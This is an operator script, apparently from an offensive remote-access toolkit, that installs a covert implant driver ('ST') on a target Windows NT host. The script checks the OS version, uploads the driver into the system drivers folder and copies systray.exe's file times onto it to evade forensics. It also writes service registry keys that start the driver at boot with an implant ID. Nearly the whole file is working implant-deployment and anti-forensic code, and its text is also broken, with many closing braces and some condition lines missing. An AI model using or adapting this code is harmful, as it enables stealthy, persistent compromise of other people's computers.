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# File: Install.eps
# Install ST.
# *** NOTE *** NOTE *** NOTE *** NOTE *** NOTE *** NOTE ***
# For EP v2.7 these two file names need leading underscores
# removed. In addition, the two calls "_GetSystemVersion" and
# "_GetSystemPaths" (found below) need underscores removed.
# *** NOTE *** NOTE *** NOTE *** NOTE *** NOTE *** NOTE ***
@include "_GetSystemPaths.epm";
@include "_GetSystemVersion.epm";
# This routine stolen from EP v3.0 (and renamed).
# We need this to be v3.0 compatible. Once we
# don't have to worry about pre-v3.0, we can
# get rid of this and use the EP-supplied
# _FileExists.epm file and _FileExists function.
# (StrLen not available prior to v3.0)
Sub myFileExists(IN STRING $file, IN STRING $path)
@echo off;
@record on;
bool $ok;
$ok = `dir "$file" -path "$path"`;
@record off;
{ return false; }
string $name = GetCmdData("name");
{ return false; }
if(sizeof($name) < 1)
{ return false; }
@echo on;
return true;
} /* end myFileExists (path) */
@echo off;
if ($argc != 4) {
echo "Usage: $argv[0] <stVersion> <driverName> <implantID>";
return false;
string $stVersion = $argv[1];
string $driver = $argv[2];
string $id = $argv[3];
# check to make sure we're NT 4 Sp4 or higher
int $majorVersion;
int $minorVersion;
int $buildNumber;
int $platformId;
int $spMajorVersion;
int $spMinorVersion;
ifnot (_GetSystemVersion($majorVersion, $minorVersion, $buildNumber, $platformId, $spMajorVersion, $spMinorVersion)) {
echo "Unable to get system version -- manually verify that";
echo "the target system is Windows NT Sp4 or greater";
} else if (($majorVersion < 4) || (($majorVersion == 4) && ($spMajorVersion < 4))) {
# NT 4 Service pack 3 or less
echo "*** Target system is pre-NT Sp4. ***";
echo " ST is not compatible with this system";
return false;
echo "Target OS: Windows NT $majorVersion.$minorVersion (build $buildNumber, platform $platformId, SP $spMajorVersion.$spMinorVersion)";
# get the root directory
string $system;
string $root;
ifnot (_GetSystemPaths($system, $root)) {
echo "* Unable to determine system root";
return false;
# systemroot will be something like: C:\WINNT\system2
string $systemroot = "$system\\$root";
echo "System root: $systemroot";
# give operator a chance to change her mind
ifnot (prompt "Are you sure you want to install $driver?") {
return false;
# We need to be careful where we place the "@record" statements.
# Prior to EP v3.0, there was a bug due to the fact that no
# counter was associated with @record. Hence, a subroutine call
# could turn @record off even though the caller wanted it on.
# Hence, if we have "@record on" at the top of this script, it
# would be turned off at this point (prior to v3.0) due to the
# above subroutine calls.
# Hence, we place it here so that we can use GetCmdData on the
# results of the getdirectory call.
@record on;
# get resource directory
ifnot (`getdirectory -scripts`) {
echo "* Unable to get scripts directory";
return false;
string $ScriptsDir = GetCmdData("dir");
ifnot (defined($ScriptsDir[0])) {
echo "* Unable to retrieve scripts directory";
return false;
string $resPath = "$ScriptsDir\\..\\..\\ST$stVersion";
@record off;
# make sure it's not already installed
if (`regquery -hive L -subkey SYSTEM\\CurrentControlSet\\Services\\$driver`) {
echo "$driver is already installed (key exists)";
return false;
# As of EP v3.0, if a file doesn't exist, dir will succeed,
# but there won't be any command data. Hence, we have to
# check for command data if dir succeeds.
# [Once we know we don't have to worry about pre-EP v3.0,
# we can just include _FileExists.epm and call _FileExists.]
if (myFileExists("$driver.sys", "$systemroot\\drivers")) {
echo "$driver is already installed (file exists)";
return false;
# Driver not installed
# put the driver
echo "Uploading:";
echo " src: $resPath\\$driver.sys";
echo " dst: $systemroot\\drivers\\$driver.sys";
if (`put "$resPath\\$driver.sys" -name "$systemroot\\drivers\\$driver.sys" -permanent`) {
echo " SUCCESS";
} else {
echo " FAILED";
return false;
# match file times for driver
echo "Matching file time for SYS";
if (`matchtimes "$systemroot\\systray.exe" "$systemroot\\drivers\\$driver.sys"`) {
echo " SUCCESS";
} else {
echo " FAILED (but continuing anyway)";
# add the registry keys
bool $keysAdded = true;
echo "Adding registry keys";
ifnot (`regadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\$driver -value ErrorControl -type REG_DWORD -data 0`) {
$keysAdded = false;
} else ifnot (`regadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\$driver -value Start -type REG_DWORD -data 2`) {
$keysAdded = false;
} else ifnot (`regadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\$driver -value Type -type REG_DWORD -data 1`) {
$keysAdded = false;
} else ifnot (`regadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\$driver -value Options -type REG_BINARY -data "0a 00 00 00 40 01 00 00 06 00 00 00 21 00 00 00 04 00 00 00 00 02 00 00 01 00 00 00 21 00 00 00 00 00 00 00 06 04 00 00 cb 34 00 00 00 07 00 00 00 00 00 00 21 00 00 00 00 00 00 00 06 04 00 00 34 cb 00 00 20 05 0a 00 01 00 00 00 00 06 00 00 01 00 00 00"`) {
$keysAdded = false;
} else ifnot (`regadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\$driver -value Params -type REG_DWORD -data $id`) {
$keysAdded = false;
if ($keysAdded == false) {
echo " FAILED";
return false;
} else {
echo " SUCCESS";
# we're done...
return true;